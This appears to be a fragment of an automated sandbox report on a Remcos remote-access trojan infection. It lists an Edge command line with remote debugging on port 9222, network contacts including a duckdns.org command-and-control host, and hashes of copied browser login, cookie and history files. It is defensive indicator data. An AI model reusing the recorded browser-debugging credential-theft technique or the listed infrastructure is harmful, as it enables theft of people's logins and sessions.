"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2108,2426443740474900385,14164072370701279149,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5424 /prefetch:1

Network

Country  Destination           Domain                          Proto
US       8.8.8.8:53            8.8.8.8.in-addr.arpa            udp
US       8.8.8.8:53            172.214.232.199.in-addr.arpa    udp
US       8.8.8.8:53            228.249.119.40.in-addr.arpa     udp
US       8.8.8.8:53            drive.google.com                udp
GB       142.250.187.206:443   drive.google.com                tcp
US       8.8.8.8:53            drive.usercontent.google.com    udp
GB       172.217.16.225:443    drive.usercontent.google.com    tcp
US       8.8.8.8:53            206.187.250.142.in-addr.arpa    udp
US       8.8.8.8:53            75.159.190.20.in-addr.arpa      udp
US       8.8.8.8:53            95.221.229.192.in-addr.arpa     udp
US       8.8.8.8:53            225.16.217.172.in-addr.arpa     udp
US       8.8.8.8:53            205.47.74.20.in-addr.arpa       udp
US       8.8.8.8:53            232.168.11.51.in-addr.arpa      udp
GB       142.250.187.206:443   drive.google.com                tcp
US       8.8.8.8:53            c.pki.goog                      udp
GB       142.250.187.227:80    c.pki.goog                      tcp
US       8.8.8.8:53            o.pki.goog                      udp
GB       142.250.187.227:80    o.pki.goog                      tcp
GB       172.217.16.225:443    drive.usercontent.google.com    tcp
US       8.8.8.8:53            227.212.58.216.in-addr.arpa     udp
US       8.8.8.8:53            227.187.250.142.in-addr.arpa    udp
US       8.8.8.8:53            6dp5nq4du.duckdns.org           udp
US       100.42.189.135:2852   6dp5nq4du.duckdns.org           tcp
US       100.42.189.135:2852   6dp5nq4du.duckdns.org           tcp
US       100.42.189.135:2852   6dp5nq4du.duckdns.org           tcp
US       100.42.189.135:2852   6dp5nq4du.duckdns.org           tcp
US       8.8.8.8:53            geoplugin.net                   udp
NL       178.237.33.50:80      geoplugin.net                   tcp
US       8.8.8.8:53            135.189.42.100.in-addr.arpa     udp
US       8.8.8.8:53            200.163.202.172.in-addr.arpa    udp
US       8.8.8.8:53            50.33.237.178.in-addr.arpa      udp
US       8.8.8.8:53            198.187.3.20.in-addr.arpa       udp
US       8.8.8.8:53            3.180.250.142.in-addr.arpa      udp
US       8.8.8.8:53            10.180.250.142.in-addr.arpa     udp
US       8.8.8.8:53            www.google.com                  udp
GB       142.250.180.4:443     www.google.com                  tcp
GB       142.250.180.4:443     www.google.com                  tcp
US       8.8.8.8:53            4.180.250.142.in-addr.arpa      udp
US       8.8.8.8:53            ogads-pa.googleapis.com         udp
US       8.8.8.8:53            apis.google.com                 udp
GB       142.250.178.10:443    ogads-pa.googleapis.com         tcp
GB       216.58.201.110:443    apis.google.com                 tcp
GB       142.250.178.10:443    ogads-pa.googleapis.com         udp
US       8.8.8.8:53            240.221.184.93.in-addr.arpa     udp
US       8.8.8.8:53            10.178.250.142.in-addr.arpa     udp
US       8.8.8.8:53            110.201.58.216.in-addr.arpa     udp
US       8.8.8.8:53            play.google.com                 udp
GB       172.217.16.238:443    play.google.com                 tcp
GB       172.217.16.238:443    play.google.com                 tcp
N/A      127.0.0.1:9222        -                               tcp
N/A      127.0.0.1:9222        -                               tcp
N/A      127.0.0.1:9222        -                               tcp
N/A      127.0.0.1:9222        -                               tcp
N/A      224.0.0.251:5353      -                               udp
N/A      127.0.0.1:9222        -                               tcp
N/A      127.0.0.1:9222        -                               tcp
US       8.8.8.8:53            55.36.223.20.in-addr.arpa       udp
US       8.8.8.8:53            tse1.mm.bing.net                udp
US       150.171.27.10:443     tse1.mm.bing.net                tcp
US       150.171.27.10:443     tse1.mm.bing.net                tcp
US       150.171.27.10:443     tse1.mm.bing.net                tcp
US       150.171.27.10:443     tse1.mm.bing.net                tcp
US       150.171.27.10:443     tse1.mm.bing.net                tcp
US       8.8.8.8:53            58.99.105.20.in-addr.arpa       udp
US       8.8.8.8:53            10.27.171.150.in-addr.arpa      udp

Files

memory/1996-4-0x00007FF840BD3000-0x00007FF840BD5000-memory.dmp

memory/1996-14-0x00000195F30A0000-0x00000195F30C2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3kecyaoi.yiq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1996-15-0x00007FF840BD0000-0x00007FF841691000-memory.dmp

memory/1996-16-0x00007FF840BD0000-0x00007FF841691000-memory.dmp

memory/1996-18-0x00007FF840BD3000-0x00007FF840BD5000-memory.dmp

memory/1996-20-0x00007FF840BD0000-0x00007FF841691000-memory.dmp

memory/1996-21-0x00007FF840BD0000-0x00007FF841691000-memory.dmp

memory/1996-24-0x00000195F3750000-0x00000195F389E000-memory.dmp

memory/1996-25-0x00007FF840BD0000-0x00007FF841691000-memory.dmp

memory/1516-26-0x0000000002270000-0x00000000022A6000-memory.dmp

memory/1516-27-0x0000000004E70000-0x0000000005498000-memory.dmp

memory/1516-28-0x0000000004CC0000-0x0000000004CE2000-memory.dmp

memory/1516-29-0x0000000004D60000-0x0000000004DC6000-memory.dmp

memory/1516-30-0x00000000054A0000-0x0000000005506000-memory.dmp

memory/1516-40-0x0000000005650000-0x00000000059A4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d4ff23c124ae23955d34ae2a7306099a
SHA1 b814e3331a09a27acfcd114d0c8fcb07957940a3
SHA256 1de6cfd5e02c052e3475d33793b6a150b2dd6eebbf0aa3e4c8e4e2394a240a87
SHA512 f447a6042714ae99571014af14bca9d87ede59af68a0fa1d880019e9f1aa41af8cbf9c08b0fea2ccb7caa48165a75825187996ea6939ee8370afa33c9f809e79

memory/1516-42-0x0000000005B90000-0x0000000005BAE000-memory.dmp

memory/1516-43-0x0000000005BC0000-0x0000000005C0C000-memory.dmp

memory/1516-44-0x00000000073D0000-0x0000000007A4A000-memory.dmp

memory/1516-45-0x0000000006140000-0x000000000615A000-memory.dmp

memory/1516-46-0x0000000006E00000-0x0000000006E96000-memory.dmp

memory/1516-47-0x0000000006DA0000-0x0000000006DC2000-memory.dmp

memory/1516-48-0x0000000008000000-0x00000000085A4000-memory.dmp

C:\Users\Admin\AppData\Roaming\Kbstadboerne8.tid

MD5 5ae15005322cfb3c865e91fef7e25d31
SHA1 634884dcb1d8177f0ee43e90b620673278a8a5b1
SHA256 e4d05ccc25a075a14ed27618fb5c00594b20ad408871bff34a038f44c8605433
SHA512 5ff3687807442ba52b7d36cbfd17c371295ed804ea27dc3867a514df46bd23152262ef7ae46fac2f0b01044c757cc347509f11a11c618fb4a3fb51b3e3eaff2d

memory/1516-50-0x00000000085B0000-0x000000000B388000-memory.dmp

memory/3252-63-0x00000000008E0000-0x0000000001B34000-memory.dmp

memory/3252-68-0x00000000206A0000-0x00000000206D4000-memory.dmp

memory/3252-72-0x00000000206A0000-0x00000000206D4000-memory.dmp

memory/3252-71-0x00000000206A0000-0x00000000206D4000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State

MD5 d24b36e7b79288c5bfad07cc8e9c1022
SHA1 f64de0a41a4929c18c43acd8bdcd04f602e5242a
SHA256 6e7ea9f68a35cf080cad9cde038399bbd886717ccf235d1bc53e5cba1694bfe8
SHA512 8ba9c6624b326a85ec08cee7e94a9acbfcb65884faedd24fe9ea5a727e6a60d5be528d0fe49e17245a31a798fd99024abe11163370326919efa6d00a5ddb9e70

memory/3252-80-0x00000000008E0000-0x0000000001B34000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

MD5 3500c39cafef8c42e21c0eed0068acf0
SHA1 4acab10148c3cd8644497fb1e2671609db926832
SHA256 9b3cd3d94f1d2f873464301319e4dca3d34f7c549b3cd9ab868470202d1574d5
SHA512 a7b49f1755b5161a693d7ff4413469b684043ea236d225698838713bdb20b0fe8fc557c2500e1b7d0fde02bf945d356a636a2c0fff7097acf50246abec32f092

\??\pipe\crashpad_1092_SHLHWLURCKDMZDKX

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\Cookies

MD5 6abb2a3b7a002d7e7ef39e61708144de
SHA1 12e623fb4e6024da765886489da8d3f28e7fcfb0
SHA256 002d9ba9a89b856381c6fb532bcb8d484814b427a8d71df6c0f9811d892eaf8e
SHA512 0b135011c2892446b7ae4662d33b664747bc8a26abdc68e5f5d42c6871c65bdfa7ff194c30375b7cfac84936287f56f26b1c6b9379bdb4135135a029ac807187

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\CURRENT

MD5 46295cac801e5d4857d09837238a6394
SHA1 44e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA256 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA512 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\MANIFEST-000001

MD5 5af87dfd673ba2115e2fcf5cfdb727ab
SHA1 d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256 f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512 de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_3

MD5 41876349cb12d6db992f1309f22df3f0
SHA1 5cf26b3420fc0302cd0a71e8d029739b8765be27
SHA256 e09f42c398d688dce168570291f1f92d079987deda3099a34adb9e8c0522b30c
SHA512 e9a4fc1f7cb6ae2901f8e02354a92c4aaa7a53c640dcf692db42a27a5acc2a3bfb25a0de0eb08ab53983132016e7d43132ea4292e439bb636aafd53fb6ef907e

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Cache\Cache_Data\data_1

MD5 d0d388f3865d0523e451d6ba0be34cc4
SHA1 8571c6a52aacc2747c048e3419e5657b74612995
SHA256 902f30c1fb0597d0734bc34b979ec5d131f8f39a4b71b338083821216ec8d61b
SHA512 376011d00de659eb6082a74e862cfac97a9bb508e0b740761505142e2d24ec1c30aa61efbc1c0dd08ff0f34734444de7f77dd90a6ca42b48a4c7fad5f0bddd17

memory/1748-177-0x0000000000400000-0x0000000000478000-memory.dmp

memory/1748-180-0x0000000000400000-0x0000000000478000-memory.dmp

memory/1748-179-0x0000000000400000-0x0000000000478000-memory.dmp

memory/4604-184-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2920-194-0x0000000000400000-0x0000000000462000-memory.dmp

memory/2920-183-0x0000000000400000-0x0000000000462000-memory.dmp

memory/4604-181-0x0000000000400000-0x0000000000424000-memory.dmp

memory/4604-182-0x0000000000400000-0x0000000000424000-memory.dmp

memory/2920-176-0x0000000000400000-0x0000000000462000-memory.dmp

memory/1748-175-0x0000000000400000-0x0000000000478000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_2

MD5 0962291d6d367570bee5454721c17e11
SHA1 59d10a893ef321a706a9255176761366115bedcb
SHA256 ec1702806f4cc7c42a82fc2b38e89835fde7c64bb32060e0823c9077ca92efb7
SHA512 f555e961b69e09628eaf9c61f465871e6984cd4d31014f954bb747351dad9cea6d17c1db4bca2c1eb7f187cb5f3c0518748c339c8b43bbd1dbd94aeaa16f58ed

C:\Users\Admin\AppData\Local\Temp\TmpUserData\GraphiteDawnCache\data_0

MD5 cf89d16bb9107c631daabf0c0ee58efb
SHA1 3ae5d3a7cf1f94a56e42f9a58d90a0b9616ae74b
SHA256 d6a5fe39cd672781b256e0e3102f7022635f1d4bb7cfcc90a80fffe4d0f3877e
SHA512 8cb5b059c8105eb91e74a7d5952437aaa1ada89763c5843e7b0f1b93d9ebe15ed40f287c652229291fac02d712cf7ff5ececef276ba0d7ddc35558a3ec3f77b0

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\AppData\Local\Temp\bkimokiusd

MD5 79f35c7500a5cc739c1974804710441f
SHA1 24fdf1fa45049fc1a83925c45357bc3058bad060
SHA256 897101ed9da25ab0f10e8ad1aeb8dabc3282ccfdb6d3171dbac758117b8731f4
SHA512 03281e8abecff4e7d1f563596a4fd2513e016b7fbf011a455141460f9448d00b4a4666d2036cb448a8ac9a6feebeb51b366289ffa2ee5524a062fe8869aec61e

memory/3252-213-0x00000000211B0000-0x00000000211C9000-memory.dmp

memory/3252-212-0x00000000211B0000-0x00000000211C9000-memory.dmp

memory/3252-209-0x00000000211B0000-0x00000000211C9000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Preferences~RFe586afa.TMP

MD5 a862864d10313a857f7f781ce1257f8d
SHA1 4ff234d2f84c5cc7f55ab4f88dfc4674a243351d
SHA256 3e2648a231880f6dbd989f6f17cb739d833ba2563ce85869873d29e568cb8ba2
SHA512 f7c8e1df09230c9d6cbbd8fe007bf458b0e13bbe8d7f7785a8f006bbd00aacdf253640e15be34ec2e35b2a7a649b9e440db0c70e2871db9cde7759974fb7235d

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State

MD5 93d1df66fe9c3858766b384d8096a505
SHA1 3a3bfc051b504a8f19f2d2b3a768178659886c5a
SHA256 5dcd4e4d047443e282cdbe4670c2a3c21ea35eef57f517e92972f8aee94affb8
SHA512 b6b5cd9c1f5ef070f51cb82ce0b52f493d9137b0def48adafd991bb105c4d0d6d8c1fa8b28af49f6296664180c5e057e6d6f40af599e1326f5702163d7dd4bd6

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Preferences

MD5 9fa4c4ddcad3ad3c3ac1da6a36a4bbff
SHA1 760f00842d4d8b3f7b1e2e2b947654847808923d
SHA256 7457905fa88287cb59523888ffad8796466925cadd104460c690a4dc2fb135b2
SHA512 54fabf44592bb804feca2f6a13846135b65f7e1850365d67724f1d8b6643ca030d6b08002d4eb38794e0582d2808c824394cf5471d208bd29feca3b9fc32a3dd

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

MD5 c32b0404d793d286be948a96b0eed2e0
SHA1 839f5e5e1b17fb8dabaf36b227795bd98bf95236
SHA256 2776be61f7010e203994ad241f62c847c124fef80be9137568cb07cee5350b2a
SHA512 bfb68c248806a908463009242b2c5c4ac539b04f59e9f3581c45c94356b11cf935e96a59548107a32d0412eb54dc0d8757640f4e0f9d9ac53e856363dfa10c26

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

MD5 13c9ea5211b71e2ef52ea9a5c7925826
SHA1 eff6f6be1d185225f77ff8bd4edf91f83b3479f6
SHA256 f36e70dac8eac6b65e5b09ff726963372a1c39a6f8859a7b14fe322f63827668
SHA512 cde2c140837f74f281a13abf45a76656fbbabd149e84c3c9cda256b053e9602af899f31ae1cd063969fc9c663bd1b89dc93f86c80300d2a7afa38e056a7022fe

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Local State

MD5 6d807cb03d37d46d7b0f81ec5dcd9a56
SHA1 6ae0b5b09af7f39e9441d10f28f1f3045d0a3b0e
SHA256 697e673f3d67c69eff5edabf04aab5d716097d794e7eec42aca391ea2453f37f
SHA512 57fd40c0eaa71a045dd9f488089dc93d8ad16c3c8f056ac13c8f81244704a0b254568c55b21768d2450816bbd9042392f663b9df62dce398bf12824113d34152

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Secure Preferences

MD5 28f95c9b6768d32d945eb36a1fd7a07c
SHA1 53ac50531aadd81c59f44008fd38159485ba54b1
SHA256 f68df18736602a87cdee17c43192a220e0ec47df8f7951a13763ad0e080d8a8e
SHA512 1a8a757825e77564b86cf8d12484142b51cd24db8d19f999094bafb7412bb979a6a406e587bf235b045d9a4947bb191f48474513b3341473bd55acd2c0429387

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\throttle_store.dat

MD5 9e4e94633b73f4a7680240a0ffd6cd2c
SHA1 e68e02453ce22736169a56fdb59043d33668368f
SHA256 41c91a9c93d76295746a149dce7ebb3b9ee2cb551d84365fff108e59a61cc304
SHA512 193011a756b2368956c71a9a3ae8bc9537d99f52218f124b2e64545eeb5227861d372639052b74d0dd956cb33ca72a9107e069f1ef332b9645044849d14af337

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

MD5 b873c36a019f007880bbd917f52a97c3
SHA1 6b1e78865ae18418313b2c45e532efebba6bd011
SHA256 76acf3a94ed467b1630674e655dd74dccb2cf0b6f00e15ab090b70292efa5709
SHA512 5c3524036dfbc4ef4d9509f3846cfd32703d55ab1f9c1a52c6037e1f27726f07c0c67b0892660150a0d2a286513dbbccdb2fdbdc45136a42c2083bed8c531a07

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

MD5 e5d52e1ef7203dfeb1e321e675631b1a
SHA1 fd21e62b42b403bd96c98012e1771bf2dc9e6eb8
SHA256 0a5cbb51fa1240cc3ad16aeacc2a5e434ca0215468ea67751aaada0b0381a939
SHA512 e0804b5769d433cb3f81397d42bc9c08f7127cc29d7d9da2ebb322d2c96e65d80db34eb7f088f6d5a130f9b7d25a4d8b1063c929bc458bc8dffcd885062864d4

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Last Version

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Web Data

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Favicons

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Login Data

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\000003.log

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\LOG

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Local Storage\leveldb\LOG

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Top Sites

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad\settings.dat

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\wasm\index

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Sync Data\LevelDB\000003.log

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\000003.log

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\000003.log

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Session Storage\LOG

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Preferences

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\LOG

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Service Worker\Database\000003.log

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\js\index-dir\the-real-index

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\shared_proto_db\metadata\LOG

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Code Cache\wasm\index-dir\the-real-index

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Service Worker\Database\LOG

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\GPUCache\index

memory/3252-374-0x00000000008E0000-0x0000000001B34000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Site Characteristics Database\LOG

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\History

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Visited Links

C:\Users\Admin\AppData\Local\Temp\TmpUserData\Default\Microsoft Edge.lnk

memory/3252-448-0x00000000008E0000-0x0000000001B34000-memory.dmp

C:\ProgramData\remcos\logs.dat

memory/3252-451-0x00000000008E0000-0x0000000001B34000-memory.dmp

memory/3252-454-0x00000000008E0000-0x0000000001B34000-memory.dmp

memory/3252-457-0x00000000008E0000-0x0000000001B34000-memory.dmp

memory/3252-460-0x00000000008E0000-0x0000000001B34000-memory.dmp

memory/3252-463-0x00000000008E0000-0x0000000001B34000-memory.dmp

memory/3252-466-0x00000000008E0000-0x0000000001B34000-memory.dmp

memory/3252-469-0x00000000008E0000-0x0000000001B34000-memory.dmp